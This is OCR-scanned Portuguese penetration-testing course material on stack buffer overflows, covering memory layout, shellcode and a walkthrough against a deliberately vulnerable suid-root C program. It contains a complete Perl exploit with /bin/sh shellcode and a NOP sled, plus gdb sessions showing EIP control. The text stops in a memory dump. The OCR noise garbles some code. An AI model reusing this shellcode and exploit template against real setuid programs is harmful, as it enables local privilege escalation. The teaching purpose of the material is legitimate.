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16 Exploits 


16.1 Objetivos 


e Entender o que é um Buffer Overflow 
e Aprender como explorar uma falha dessa categoria 


e Fornecer informações para a realização do exame da certificação NOP 


(Network Offensive Professional) da empresa Immunity 


| Objetivos 


= Entender o que e um Buffer Overflow 


= Aprender como explorar uma falha dessa 
categoria 


= Fornecer informações para a realização do 
exame da certificação NOP (Network 
Offensive Professional) da empresa Immunity 





16.2 O que é um exploit? 


Um exploit, em seguranca da informacáo, é um programa de computador, uma 
porcáo de dados ou uma sequéncia de comandos que se aproveita das 
vulnerabilidades de um sistema computacional — como o próprio sistema operativo 


ou servicos de interacáo de protocolos (ex: servidores Web). 
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| Mas afinal, o que é um exploit? 


= Um exploit, em segurança da informação, е 
um programa de computador, uma porção de 
dados ou uma sequência de comandos que se 


aproveita das vulnerabilidades de um sistema 
computacional 





São geralmente elaborados por hackers como programas de demonstração das 
vulnerabilidades, a fim de que as falhas sejam corrigidas, ou por crackers a fim de 
ganhar acesso não autorizado a sistemas. Por isso muitos crackers não publicam 


seus exploits, conhecidos como Odays, e o seu uso massificado deve-se aos script- 
kiddies. 


Quem cria exploits? 


= Programadores habilidosos 
" Hackers 
" Crackers 


= Pesquisadores 
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Quatro sites que podem ser usados como fonte de exploits sáo: 
e www.milwOrm.com 
e www.securityfocus.com 
e www.packetstormsecurity.com 


e www.metasploit.com 


Fontes de exploits 


www.milworm.com 
www.securityfocus.com 
www.packetstormsecurity.com 
www.metasploit.com 
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16.3 Organizacáo dos Processos na Memoria 


| Organização dos processos na 
memória 


= Todos leram o material introdutorio? 


É extremamente importante para entendermos 
como uma exploração acontece! 


= Ok... Então vamos ver uma breve revisão do 
material introdutorio 





Para entendermos como funciona um buffer overflow, nós precisaremos entender 


como funciona a pilha (stack). 


A região de texto é fixa pelo programa e inclui as instruções propriamente ditas e os 
dados “somente leitura”. Esta região corresponde ao segmento de texto do binário 
executável e é normalmente marcada como somente-leitura para que qualquer 
tentativa de escrevê-la resulte em violação de segmentação (com o objetivo de não 


permitir código auto-modificável). 


Os processos em execução são divididos em quatro regiões: texto, dados, pilha e 
heap. A pilha é um bloco de memoria contíguo utilizado para armazenar as variáveis 
locais, passar parámetros para funções e armazenar os valores de retornos destas. 
O endereço de base da pilha é fixo e o acesso à estrutura é realizado por meio das 
instruções PUSH e POP implementadas pelo processador. O registrador chamado 


"ponteiro de pilha” (SP) aponta para o topo da pilha. 


A pilha consiste em uma sequência de frames que são colocados no topo quando 


uma função é chamada e são retirados ao final da execução. Um frame contém os 
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parámetros para a funcáo, suas variáveis locais, e os dados necessários para 
recuperar o frame anterior, incluindo o valor do ponteiro de instrucáo no momento 


da chamada de função. 


Dependendo da implementação, a pilha pode crescer em direção aos endereços 
altos ou baixos. O ponteiro de pilha também é de implementação dependente, 
podendo apontar para o último endereço ocupado na pilha ou para o próximo 
endereço livre. Como o texto trata da arquitetura Intel x86, iremos utilizar uma pilha 
que cresce para os endereços baixos, com o ponteiro de pilha (registrador ESP) 


apontando para o último endereço da pilha. 


Além de um ponteiro de pilha, também é conveniente contar com um “ponteiro de 
frame" (FP) que aponta para um endereço fixo no frame. A princípio, variáveis locais 
podem ser referenciadas fornecendo-se seus deslocamentos em relação ao 
ponteiro de pilha. Entretanto, quando palavras são inseridas e retiradas da pilha, 
estes deslocamentos mudam. Apesar de em alguns casos o compilador poder 
corrigir os deslocamentos observando o número de palavras na pilha, essa gerência 
é cara. O acesso a variáveis locais a distâncias conhecidas do ponteiro de pilha 
também iria requerer múltiplas instruções. Desta forma, a maioria dos compiladores 
utiliza um segundo registrador que aponta para o topo da pilha no início da 
execução da função, para referenciar tanto variáveis locais como parámetros, já que 
suas distâncias não se alteram em relação a este endereço com chamadas a PUSH 
e POP. Na arquitetura Intel x86, o registrador EBP é utilizado para esse propósito. 
Por causa da disciplina de crescimento da pilha, parâmetros reais têm 
deslocamentos positivos e variáveis locais têm deslocamentos negativos a partir de 
FP. 


A primeira instrução que um procedimento deve executar quando chamado é salvar 
o FP anterior, para que possa ser restaurado ao fim da execução. A função então 
copia o registrador de ponteiro de pilha para FP para criar o novo ponteiro de frame 
e ajusta o ponteiro de pilha para reservar espaço para as variáveis locais. Este 
código é chamado de prólogo da função. Ao fim da execução, a pilha deve ser 
restaurada e a execução deve retomar na instrução seguinte à de chamada da 


função, o que chamamos de epílogo. As instruções CALL, LEAVE e RET nas 
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máquinas Intel sáo fornecidas para parte do prólogo e epílogo em chamadas de 
funcáo. A instrucáo CALL salva na pilha o endereco da instrucáo seguinte como 
endereco de retorno da funcáo chamada. A instrucáo RET deve ser chamada dentro 


do procedimento e restaura a execucáo no endereco que está no topo da pilha. 


Texto (msiruções do 


programa) T Endereços altos 


Parámetros da função 


Dados 
Endereço de retorno (variáveis globais e езабсаз ) f 

| ! PE | W4 Base da pilha 
FP salvo da função anterior Frame de chamada 
FP p de procedimento 





Vanaveis locais A | 4 SP 








q 4 Endereços baixos 


| Introdução - Memory Space 


Texto (nstruções do 
programa) 


Parámetros da função 
nm Dados 
Endereco de retorno (variáveis globais e estábcas) 


T Enderegos altos 


= — 4 Base da pilha 
Frame de chamada 
de procedimento 


| Endereços baixos 
+ 
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| | Introdução aos registradores 


Esta aula е baseada em IA32 
EAX, EBX e ECX 


Pode user usado para armazenar dados e 


endereços, offsets, dentre outras funções 
ESP (Stack Pointer) 
Aponta para o topo da pilha 


EIP (Instruction Pointer) 


Contém o endereco da proxima instrucáo de 
maquina a ser executada 





16.4 Shellcode 


Shellcode é um grupo de instruções assembly em formato de opcode para realizar 
diversas funções como chamar uma shell, ou escutar em uma porta. Geralmente, 
um shellcode é utilizado para explorar determinada vulnerabilidade, ganhando-se 
controle sobre a aplicação vulnerável e podendo-se executar qualquer instrução 


desejada. 
Exemplo de shellcode mais simples possível: 
Shellcode = “\xbb\x00\x00\x00\x00\xb8\x01\x00\x00\x00\xcd\x80” 


A imagem a seguir mostra detalhes sobre a criacáo do shellcode: 
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driqotrodr igo: 
Section .text 


global start 


mou ebx,O 
mou eax,1 
int 0xB0 


rodrigotrodrigo: 5 nasm -f elf exit shellcode.azsm 
гойгіцовгойг іцо: $ ld -o exit shellcode exit shellcode.o 
rodrigosrodrigo: © objdump -A exit shellcode 


exit shel lcode: file format elf32-1306 
Disassembly of section .text: 


00045000 < start»: 
580458080 : bb 00 00 00 00 50x0, “ebx 
00458085 : bs 01 GO OO OO SOx1, “eax 
30480Ba : cd 80 5080 
rodrigotsrodrigo: 5 


Introdução ao shellcode 


O que é um shellcode? 
Um simples exemplo que executa um exit() 


Shellcode = “\xbb\xoo\xoo\xoo\xoo\xb8\xo1\xoo\xoo\xoo\xcd\x80” 


rodrigofrodrigo: 9 cat exit she 
Section .text 


global _start 


mou ebx,O 
mou eax,1 
int 0x80 


rodr igo&rodrigo:" 9 nasm -f elf exit_shellcode.asm 
rodrigo@rodr igo: 79 ld -o exit shellcode exit_shellcode.o 
rodrigofrodrigo:”S ob jdump -d exit shellcode 
exit_shellcode: file format elf32-i386 


Disassembly of section .text: 


08048080 <_start>: 
8048080: 00 00 00 00 S0x0 ‚хех 
8048085: 01 00 00 00 90х1,хеах 
804808a : а 80 50x80 
rodr ідобгодг ідо : 79$ 





О shellcode acima пао е "injetável", pois possui Null Bytes (/x00), o que caracteriza 
um final de string. Portanto, ao usarmos o shellcode acima, o programa encontrará o 
final da string e parara, nao executando o restante do nosso payload. Mais detalhes 


veremos logo abaixo. 


Shellcode Injetavel: “\x31\xdb\xb0\x01\xcd\x80” 
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rodrigobBrodrigo: q cat exit shellcode injectable.asm 
Section .tcxt 


global | start 
| start: 


xor ebx,ebx 
mou al,1 
int 0x80 


rodrigoBProdrigo: 5 nasm -f elf exit shellcode injectable сш 
rodrigotrodrigo:~5 ld -o exit shellcode injectable exit_shellcode_injectable.o 
rodrigogrodrigo:" 5 ob jdump -A exit shellcode injectable 


exit shellcode injectable: file format е1#32-1386 
Disassembly of section .text: 


08048080 < start»: 
0045060 : 31 db хог BDO, “ех 
bo 01 mou öxi, xal 
int 5080 





No exemplo de exploracáo de um Stack Overflow, utilizaremos um outro shellcode, 
que se encarregará de executar o /bin/sh ao invés de executar a funcáo exit(), como 


o shellcode acima faz. 


| Shellcode 


= Oshellcode anterior não é injetável, pois possui Null Bytes. 
= Shellcode Injetavel: “\x31\xdb\xbo\xo1\xcd\x80” 


rodrigo@rodrigo: у cat exit_shellcode_injectable.asm 
scction .tcxt 


global _start 


xor ebx,ebx 
mou al,1 
int 0x80 


rodriqo8rodriqo: $ nasm -f elf exit shellcode injectable.asm 
rodrigoBProdrigo: $ ld -o exit shellcode injectable exit shelicode in jectable.o 


одг igofrodrigo: $ ob jdump -d exit_shellcode_in jectable 


>xit_shellcode_in jectable: file format elf32-i386 
Disassembly of section .text: 


08048080 <_start>: 
8048080 : 31 db xor Zzebx,Z2€ebx 
8048082 : bO 01 mou $0x1,7al 
8048084 : cd 80 int 50x80 
frodr igo@rodrigo:~$ 





16.5 Buffer Overflow 


Um buffer overflow acontece quando um programa vulneravel a esse tipo de falha 


tenta copiar mais informações para dentro de um buffer do que esse buffer 
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consegue suportar. Para visualizar isso, é a mesma coisa que pegar uma garrafa de 
refrigerante de 2 litros e virar ela toda num copo de 500ml. Com certeza ocorrera 
uma sujeira na mesa em que isso foi feito, e € a mesma coisa que ocorre na 
memoria, um esparramado de caracteres sobre a memoria que irá sobrescrever 


informacóes importantes assim como o refrigerante sujou toda a toalha da mesa. 


| Buffer Overflow 


= Um buffer overflow acontece quando um 
programa vulnerável a esse tipo de falha 
tenta copiar mais informações para dentro de 


um buffer do que esse buffer consegue 
suportar 


O que acontece quando tentamos colocar 
uma garrafa de 600ML de coca em um copo 
que cabe apenas 300ML? 





As vulnerabilidades de buffer overflow são consideradas ameaças críticas de 
segurança, apesar de ser uma falha bem conhecida e bastante séria, que se origina 
exclusivamente na ignorância do programador referente a aspectos de segurança 
durante a implementação do programa, o erro se repete sistematicamente a cada 


nova versão ou produto liberado. 


Este tipo de vulnerabilidade tem sido largamente utilizado para a penetração remota 
de computadores ligados a uma rede, onde um atacante anônimo tem como objetivo 
obter acesso ilegal ao computador vulnerável. Mesmo software considerado seguro, 
como o OpenSSH, já apresentou o problema, e também softwares famosos como o 


Sendmail e módulos do Apache. 
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| Buffer Overflow 


= As vulnerabilidades de buffer overflow sao 
consideradas ameaças críticas de segurança, 
apesar de ser uma falha bem conhecida e 
bastante seria, que se origina exclusivamente na 


ignorancia do programador referente a aspectos 
de segurança durante a implementação do 
programa, o erro se repete sistematicamente a 
cada nova versão ou produto liberado 


Exemplos: MSRPC, Openssh, Apache, IIS, dentre 
outros 





Buffer overflows são também chamados de buffer overruns e existem diversos tipos 
de ataques de estouro de buffer, entre eles stack smashing attacks, ataques contra 
buffers que se encontram na pilha (vou chamá-la de stack), e heap smashing 
attacks, que são ataques contra buffers que se encontram na heap. Tecnicamente, 
um buffer overflow é um problema com a lógica interna do programa, mas a 
exploração dessa falha pode levar a sérios prejuízos, como por exemplo, o primeiro 
grande incidente de segurança da Internet - o Morris Worm, em 1988 - utilizava 


técnicas de estouro de buffer, num programa conhecido como fingerd. 


O objetivo de uma exploração contra um programa privilegiado vulnerável a buffer 
overflow é conseguir acesso de tal forma que o atacante consiga controlar o 
programa atacado, e se o programa possuir privilégios suficientes, ou seja se ele 


possui flag suid root, controlar a máquina. 


16.5.1 Stack Overflow 


No stack overflow tentaremos sobrescrever o endereço de retorno da função. 


A figura seguinte mostra o objetivo da exploração de um Stack Overflow: 
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Return 
Fixed size buffer address 





stack 





Return 
Fixed size buffer address 


Exploit code 7 











Stack 





| Stack Overflow 


= No stack overflow tentaremos sobrescrever о 
endereço de retorno da função. 


Return 
Fixed size bulter address 

















^" MEN 


Return 
Fixed size buffer address 











Exploit code + | 





Por esse ser o método mais fácil ае ser compreendido, mostraremos com detalhes, 


como podemos tirar proveito desse tipo de problema. 


A idéia da exploracáo é simples. Sabendo que o EIP é um registrador que guarda 
um endereco de retorno de uma funcáo, entáo, se nos conseguirmos alterar esse 
endereco, podemos desviar a execucáo do programa para alguma outra instrucao 
que esta na memória, apenas colocando o endereco dessa instrucáo no registrador 
EIP. 
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Como desejamos executar um programa apropriado, iremos utilizar um shellcode, 


que nada mais é do que um conjunto de instrucóes que será colocado diretamente 
na memória. 


| | Stack Overflow 


= A idéia da exploração é simples. Sabendo que o 
EIP é um registrador que guarda um endereço de 
retorno de uma função, então, se nos 
conseguirmos alterar esse endereço, podemos 
desviar a execução do programa para alguma 


outra instrução que esta na memória, apenas 
colocando o endereço dessa instrução no 
registrador EIP. 


Como desejamos executar um programa 
apropriado, iremos utilizar um shellcode, que 
nada mais é do que um conjunto de instruções 
que sera colocado diretamente na memória. 





Abaixo, temos um programa vulnerável a esse tipo de falha, que será usado durante 
toda a explicação. O sistema utilizado para demonstração foi um Mandrake Linux 
8.2 num processador com arquitetura intel de 32 bits ( IA-32 ). Portanto, os 


endereços de funções podem variar para outra distribuição. 
#include <stdio.h> 

int main(int argc, char *argv[]){ 

char buffer[1024]; 


printf("Esse é o programa com falha!!!\n"); 


if(argc != 2){ 


printf("Modo de usar: %s [bytes]in",argv[0)); 
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printf("A string digitada tem %d caracteres.\n", strlen(argv[1 ])); 


strcpy(buffer, argv[1]); 


return 0; 





Programa Vulneravel 


#include <stdio.h> 
int main(int argc, char *argv[]){ 
char buffer[ 1024]; 
printf("Esse é o programa com falha!!!\n"); 
if(argc != 2){ 
printf("Modo de usar: %s [bytes]\n",argv[0]); 
exit(1); 


} 


printf("A string digitada tem %d caracteres. In”, strlen(argv[1])); 


strcpy(buffer, argv[1]); 
return 0; 


} 





Agora vamos compilar o nosso programa da seguinte forma: 
[stack@localhost buffer]$ gcc bug.c -o bug 


[stack@localhost buffer]$ 


Para ficar mais interessante, iremos definir uma permissao diferente nesse arquivo, 
o suidroot. Com esse tipo de permissáo, o programa é executado com privilegios de 
outro usuario. Para ficar mais interessante, esse usuario será o root, pois é o 


usuario que tem maior poder no sistema. 
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[stack@localhost buffer]$ su 
Password: 


[root@localhost buffer]? chown root.root bug 
[root@localhost buffer] chmod 4755 bug 
[root@localhost buffer]# Is –1 


total 20 

-rwsr-xr-x root root 14178 Ago 19 16:12 bug” 
-rw-rw-r-- 1 stack stack 489 Ago 19 16:07 bug.c 
[root@localhost buffer]# 





Agora, vamos testar o nosso programa até conseguir uma mensagem de falha de 


segmentacao. 


[stack@localhost buffer]$ ./bug "perl -e ‘print "A" x 1032" 
Esse é o programa com falha!!! 

A string digitada tem 1032 caracteres. 

[stack@localhost buffer]$ ./bug “perl -e 'print "A" x 1036" 
Esse é o programa com falha!!! 

A string digitada tem 1036 caracteres. 

Segmentation fault 

[stack@localhost buffer]$ 


Teste 


= Vamos testar o nosso programa até 
conseguir uma mensagem de falha de 
segmentação 


[stack@localhost buffer]$ ./bug ‘perl -e 'print "A" x 1032" 
Esse é o programa com falha!!! 

A string digitada tem 1032 caracteres. 

[stack@localhost buffer]$ ./bug ‘perl -e 'print "A" x 1036" 
Esse é o programa com falha!!! 

A string digitada tem 1036 caracteres. 

Segmentation fault 

[stackOlocalhost buffer]$ 
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Agora, vamos reproduzir isso usando um debuger bastante conhecido que é o gdb. 


[stack(2 localhost buffer]$ gdb bug 


GNU gdb 5.1.1 
Copyright 2002 Free Software Foundation, Inc. 


GDB is free software, covered by the GNU General Public License, and you are welcome to change it 
and/or distribute copies of it under certain conditions. 


Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "¡386-mandrake-linux"... 

(gdb) r ‘perl -e 'print "A" x 1036" 

Starting program: /home/stack/testes/buffer/bug perl -e 'print "A" x 1036" 
Esse é o programa com falha!!! 


A string digitada tem 1036 caracteres. 


Program received signal SIGSEGV, Segmentation fault. 


0x00000002 in ?? () 


[stackOlocalhost buffer]$ gdb bug 
GNU gdb 5.1.1 
Copyright 2002 Free Software Foundation, Inc. 


GDB is free software, covered by the GNU General Public License, and you are welcome to 


change it and/or distribute copies of it under certain conditions. 

Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for details. 
This GDB was configured as "¡386-mandrake-linux"... 

(gdb) r ‘perl -e 'print "A" x 1036" 

Starting program: /home/stack/testes/buffer/bug "perl -e 'print "A" x 1036" 
Esse é o programa com falha!!! 

A string digitada tem 1036 caracteres. 

Program received signal SIGSEGV, Segmentation fault. 


0x00000002 in ?? () 
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oabendo que a nossa meta é sobrescrever o EIP, que é o registrador que guarda o 


nosso endereco de retorno, vemos que o resultado nào foi o esperado, pois o 


programa tentou saltar para o endereço 0x00000002. Vamos ver o que aconteceu. 


| Objetivo 


= Sabendo que a nossa meta е sobrescrever o 
EIP que é o registrador que guarda o nosso 
endereço de retorno, vemos que o resultado 


não foi o esperado, pois o programa tentou 
saltar рага o endereço 0x00000002. Vamos 
ver o que aconteceu. 





(gdb) info all 


eax 


ecx 


edx 


ebx 


esp 


ebp 


esi 


edi 


eip 


eflags 


0x0 0 


Ox4eff4040 1325350976 


0x50004141 1342193985 


0x4015c98c 1075169676 


Oxbffff3d4 Oxbffff3d4 


0x41414141 0x41414141 


0x4001526c 1073828460 


Oxbffff434 -1073744844 


0x2 0x2 


0x10286 66182 
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0x23 35 


Ox2b 43 


Ox2b 43 


Ox2b 43 


0x0 0 


(gdb) info all 


Ox4eff4040 1325350976 
0x50004141 1342193985 
0x4015c98c 1075169676 
Oxbffff3d4 Oxbffff3d4 
0x41414141 0х41414141 
0x4001526c 1073828460 
Oxbffff434 -1073744844 
0x2 0x2 

eflags 0x10286 66182 

cs Ox23 35 

ss 0x2b 43 

ds Ox2b 43 
Ox2b 43 


0x0 0 





r 


Tendo em mente que o correspondente em hexadecimal da tabela ASCII do “A” é 
41, podemos ver que sobrescrevemos o registrador EBP com 4 "A"s. A nossa meta 
é sobrescrever o ElP com 4 “A”s, para ter o controle exato sobre o registrador. 


Entáo, vamos adicionar mais 4 bytes e ver o que acontece: 
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| Objetivo 


= Tendo em mente que o correspondente em 


, 


hexadecimal da tabela ASCII do "A" e 41, 
podemos ver que sobrescrevemos o 


registrador ЕВР com 4 “A”s. А nossa meta е 
sobrescrever o EIP com д "A"s, para ter o 
controle exato sobre o registrador. Entao, 
vamos adicionar mais 4 bytes e ver o que 
acontece: 





(gdb) r perl -e print "A" x 1040" 
The program being debugged has been started already. 


Start it from the beginning? (y or n) y 


Starting program: /home/stack/testes/buffer/bug ‘perl -e ‘print "A" x 1040" 
Esse é o programa com falha!!! 


A string digitada tem 1040 caracteres. 


Program received signal SIGSEGV, Segmentation fault. 


0x41414141 in ?? () 


(gdb) info all 

eax 0x0 O 

ecx Ox4eff4040 1325350976 
edx 0x50004141 1342193985 


ebx 0x4015c98c 1075169676 
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Oxbffff3d0 Oxbffff3d0 


0x41414141 0x41414141 


0х4001526с 1073828460 


OxbffffA34 -1073744844 


0x41414141 0x41414141 < 


0x10286 66182 


0x23 35 


Ox2b 43 


Ox2b 43 


Ox2b 43 


0x0 0 


(gdb) r "perl -e 'print "A" x 1040" 
The program being debugged has been started already. 
Start it from the beginning? (y or n) y 
Starting program: /home/stack/testes/buffer/bug ‘perl -e print "A" x 1040" 
Esse é o programa com falha!!! 
A string digitada tem 1040 caracteres. 
Program received signal SIGSEGV, Segmentation fault. 
0x41414141 in ?? () 
(gdb) info all 
Ox0 O 
Ox4eff4040 1325350976 
0x50004141 1342193985 
0x4015c98c 1075169676 
Oxbffff3d0 OxbffffadO 
0x41414141 0x41414141 
0x4001526c 1073828460 
Oxbffff434 -1073744844 
0x41414141 0x41414141 < 
eflags 0x10286 66182 
cs 0x23 35 


SS Ox2b 43 





Agora que o EIP foi sobrescrito com 4 "A"s e sabemos o tamanho exato do nosso 


buffer para isso ocorrer, podemos escrever qualquer endereco no EIP. 


Feito isso, vamos construir um programa que tire proveito dessa situação. Esse 


programa é conhecido como exploit. 
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No nosso exploit, iremos usar um buffer de 1040 bytes e vamos completa-lo da 


seguinte forma: 


N = NOP (0x90) / S = Shellcode / R = ESP (+ offset). 


Buffer: NNNNNNNNNNNNNNNNNNNNNSSSSSSSSSSSSSSSSRRRR] 


EIP Controlado 


Agora que o EIP foi sobrescrito com д "A”s e 
sabemos o tamanho exato do nosso buffer para isso 
ocorrer, podemos escrever qualquer endereco no 
EIP. 


Feito isso, vamos construir um programa que tire 
proveito dessa situacao. Esse programa e conhecido 
como exploit. 


No nosso exploit, iremos usar um buffer de 1040 
bytes e vamos completa-lo da seguinte forma: 


N = NOP (oxgo) / S = Shellcode / R = ESP (+ offset). 
Buffer: NNNNNNNNNNNNSSSSSSSSSSSSRRRR] 





Note que enchemos a primeira parte do buffer com NOPs. NOP é uma instrucáo 
que indica NO OPERATION, ou seja, quando a cpu le essa instrucáo, ela 


simplesmente passa para a próxima sem fazer nada. 


Como estamos na pilha, os bytes sáo colocados de forma seqüencial e com isso, os 


NOPs nos levará ate a execucáo do nosso shellcode. 


E por fim, no final do nosso buffer, exatamente na posição 1036, entra o endereço 
de retorno. 


Feito isso, agora precisamos saber qual endereco de retorno vamos usar. Esse 
endereco tem que ser um endereco que aponte para a posicáo de memoria onde 
estáo os nosso NOPs, para entao os NOPs servirem de escorregador para o nosso 


shellcode. Fica muito mais fácil utilizar NOP do que procurar o endereco do inicio do 
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nosso shellcode na memoria, pois como foi dita anteriormente, uma vez que um 
NOP for executado, ele nos levara ate o shellcode e pelo fato de ter vários NOPs na 


memoria, fica fácil de ser localizado. 


Abaixo irei criar um exploit utilizando a linguagem Perl, porque conseguimos 

enxergar mais facilmente o que esta acontecendo do que na linguagem C. 

tt /usr/bin/perl 

$shellcode = "\x31\xcO\x31\xdb\xb0\x17\xcd\x80". 
"\xeb\x1 fix5e\x89\x 76\x08\x31\xc0\x88\x46\x07\x89". 
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c". 
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xft". 


"\xff\xff/bin/sh"; 


$len = 1040; # Tamanho necessario pra controlar o EIP. 
$ret = 0x41414141; # Aqui vai o retorno que queremos colocar no EIP 


$nop = "x90" #1А-32 NOP 


# completando o nosso buffer com a quantidade exata de nop. O “-4” é o tamanho do endereco de 


retorno 
for ($i = 0; $i < ($len - length($shellcode) - 4); $i++) { 


$buffer .= $nop; 


# aqui copiamos o shellcode depois dos nops 
$buffer .= $shellcode; 


print("Address: Ox", sprintf('%olx',($ret)), ^n"); 


# aqui convertemos o ret para string no estilo do shellcode:\x41\x41\x41\x41 


$new ret = pack(!', ($ret)); 
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# aqui adicionamos o ret no final do buffer ( apos o shellcode ) 
for ($i += length($shellcode); $i « $len; $i += 4) ( 


$buffer .= $new ret; 


# aqui executamos o nosso programa com a nossa string 


exec("./bug", $buffer); 


st/usr/bin/perl 

$shellcode = "\x31\xc0\x31\xdb\xb0\x1 7\xcd\x80". 
"\xeb\x1 f\x5e\x89\x76\x08\x31\xcO\x88\x46\x07\x89". 
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c". 
"\xcd\x80\x31 \xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". 
"\xff\xff/bin/sh"; 

$len = 1040; # Tamanho necessario pra controlar o EIP. 

$ret = 0x41414141; # Aqui vai o retorno que queremos colocar no EIP 

$nop = x90" #1А-32 NOP 

# completando o nosso buffer com a quantidade exata de nop. O “-4” é o tamanho do endereço de retorno 

for ($i = 0; $i « ($len - length($shellcode) - 4); $i++) ( 

$buffer .= $nop; 

} 

# aqui copiamos o shellcode depois dos nops 

$buffer .= $shellcode; 

print("Address: Ox", sprintf('%lx',($ret)), ^n"); 

# aqui convertemos о ret para string no estilo do shellcode:\x41\x41\x41\x41 

$new_ret = pack('l', ($ret)); 

# aqui adicionamos o ret no final do buffer ( apos o shellcode ) 

for ($i += length($shellcode); $i < $len; $i += 4) ( 

$buffer .= $new ret; 
} 
# aqui executamos o nosso programa com a nossa string 


exec("./bug", $buffer); 





No exploit acima, foi colocado na variável ret um endereco de retorno errado, a fim 
de causar uma falha de segmentacáo para que possamos procurar os nossos NOPs 


na memória. 


Precisamos habilitar o "core dumping" para que conseguimos analisar o que esta 
acontecendo na memoria atraves de um arquivo que é gerado quando ocorre a 


falha de segmentacáo. O comando utilizado é “ulimit -c unlimited" e precisa ser 


executado como usuário root. 


[root@localhost buffer]# ulimit -c unlimited 


[root@localhost buffer] perl —x exploit. pl 





www.4linux.com.br 


Teste de Intrusáo em Redes Corporativas (407) 


Address: 0x41414141 
Esse é o programa com falha!!! 


A string digitada tem 1040 caracteres. 


Segmentation Fault (core dumped) 


[root@localhost buffer]# Is -I 

total 92 

-rwsr-xr-x 1 root root 20618 Ago 19 17:12 bug” 

-rw-rw-r-- 1 stack stack 423 Ago 19 16:18 bug.c 
root 69632 Ago 19 18:53 core 


-rw-rw-r-- {1 stack stack 1834 Ago 19 18:52 exploit.pl 





| Core Dumped 


= # ulimit — unlimited 


[root@localhost buffer]? ulimit -c unlimited 

[root@localhost buffer]# perl —x exploit. pl 

Address: 0x41414141 

Esse é o programa com falha!!! 

A string digitada tem 1040 caracteres. 

Segmentation Fault (core dumped) 

[root@localhost buffer]# Is -I 

total 92 

-rwsr-xr-x 1root root 20618 Ago 19 17:12 bug* 

-rw-rw-r-- 1 Stack stack 423 Ago 19 16:18 bug.c 
root 69632 Ago 19 18:53 core 


-rw-rw-r-- 1 stack stack 1834 Ago 19 18:52 exploit.pl 





Feito isso, temos um novo arquivo no nosso diretorio. Agora, vamos analisar esse 
arquivo. 


[root@localhost buffer]? gdb —c core 


GNU gdb 5.1.1 


Copyright 2002 Free Software Foundation, Inc. 
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GDB is free software, covered by the GNU General Public License, and 


you are 
welcome to change it and/or distribute copies of it under certain 
conditions. 

Type "show copying" to see the conditions. 

There is absolutely no warranty for GDB. Type "show warranty" for 
details. 

This GDB was configured as "i386-mandrake-linux". 

Core was generated by `./bug ". 

Program terminated with signal 11, Segmentation fault. 


#0 0x41414141 in ?? () 





| Analisando o arquivo core 


[root@localhost buffer]? gdb —c core 

GNU gdb 5.1.1 

Copyright 2002 Free Software Foundation, Inc. 

GDB is free software, covered by the GNU General Public License, and 
you are 

welcome to change it and/or distribute copies of it under certain 
conditions. 


Type "show copying" to see the conditions. 


There is absolutely no warranty for GDB. Type "show warranty" for 


details. 


This GDB was configured as "i386-mandrake-linux". 


Core was generated by './bug '. 
Program terminated with signal 11, Segmentation fault. 


#0 0x41414141 in ?? () 





Aqui, podemos comprovar que o nosso exploit esta executando perfeitamente, pois 
esta escrevendo 0x41414141 no EIP. Feito isso, basta encontrar os NOPs na 


memoria. Para isso, usaremos o seguinte comando dentro do gdb: 


(gdb) x/200x $esp 
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Oxbffff3f0:0x00000000 


OxbffffAO0: 


Oxbffff410: 


OxbffffA20: 


OxbffffA30: 


OxbffffA40: 


OxbffffA50: 


OxbffffA60: 


OxbffffA70: 


OxbffffA80: 


OxbffffA90: 


Oxbffff4a0: 


Oxbffff4b0: 


OxbffffAcO: 


OxbffffAdO: 


Oxbffff4e0: 


OxbffffAfO:Oxbffffea2OxbffffeadOxbffffeb8 


Oxbffff500: 


Oxbffff510: 


Oxbffff520: 


Oxbffff530: 


Oxbffff540: 


Oxbffff550: 


0x08048570 


0x00000000 


0x00000002 


0x080484a0 


0x08048570 


0x00000002 


Oxbffff9b9 Oxbffff9d6 Oxbffff9t4 


Oxbffffa200xbffffa330xbffffa4b 


Oxbffffa7f Oxbffffa880xbffffalb2 


Oxbffffad30xbffffcb1 Oxbffffcbf 


Oxbffffcf4 Oxbffffd230xbffffd3d 


Oxbffffd96Oxbffffda7Oxbffffdbb 


Oxbffffdd7Oxbffffde2Oxbffffdef 


OxbffffeOAOxbffffe130xbffffe4e 


Oxbffffe6cOxbffffe 7/aOxbffffe83 


Oxbfffff18 Oxbfffff2a Oxbfffff3b 


0x00000000 


0x00001000 


0x08048034 


0x00000006 


0x00000000 


--- Type «return» to continue, or q «return» to quit--- 


Oxbffff560: 


Oxbffff5 70: 


0x00000000 


0x00000000 


Oxbffff4540xbffff4600x0804831e 


0x00000000 Oxbffff428 0x4003e26a 
OxbffffA600x4015abcO 0x40014d28 
0x080483a0 0x00000000 0x080483c1 
0x00000002 Oxbffff454 0x08048308 
0x4000cc20 Oxbffff44c 0x400152cc 
Oxbffff5a20xbffff5a8 0x00000000 

Oxbffffa06 

Oxbffffa6d 

Oxbffffabc 

OxbffffceO 

Oxbffffd52 

Oxbffffdc6 

Oxbffffdfc 

Oxbffffe5e 

Oxbffffe94 

OxbfffffO9 

Oxbfffffe6 
0x00000010 0x0383fbff 0x00000006 
0x0000001 1 0x00000064 0x00000003 
0x00000004 0x00000020 0x00000005 
0x00000007 0x40000000 0x00000008 
0x00000009 0x080483a0 0x0000000b 
0x0000000c 0x00000000 0x0000000d 
0x0000000e 0x00000000 0x0000000f 
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Oxbffff580: 


Oxbffff590: 


Oxbffff5a0: 


Oxbffff5bO: 


Oxbffff5cO: 


Oxbffff5d0: 


Oxbffff5eO: 


Oxbffff5f0:0x90909090 


Oxbffff600: 


Oxbffff610: 


Oxbffff620: 


Oxbffff630: 


Oxbffff640: 


Oxbffff650: 


Oxbffff660: 


Oxbffff6 70: 


Oxbffff680: 


Oxbffff690: 


Oxbffff6a0: 


Oxbffff6bO: 


OxbffffGcO: 


Oxbffff59d0x00000000 0x00000000 0x00000000 

0x00000000 0x00000000 0x00000000 0x38366900 
Ox2f2e0036 0x00677562 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
0x90909090 0x90909090 0x90909090 0x90909090 
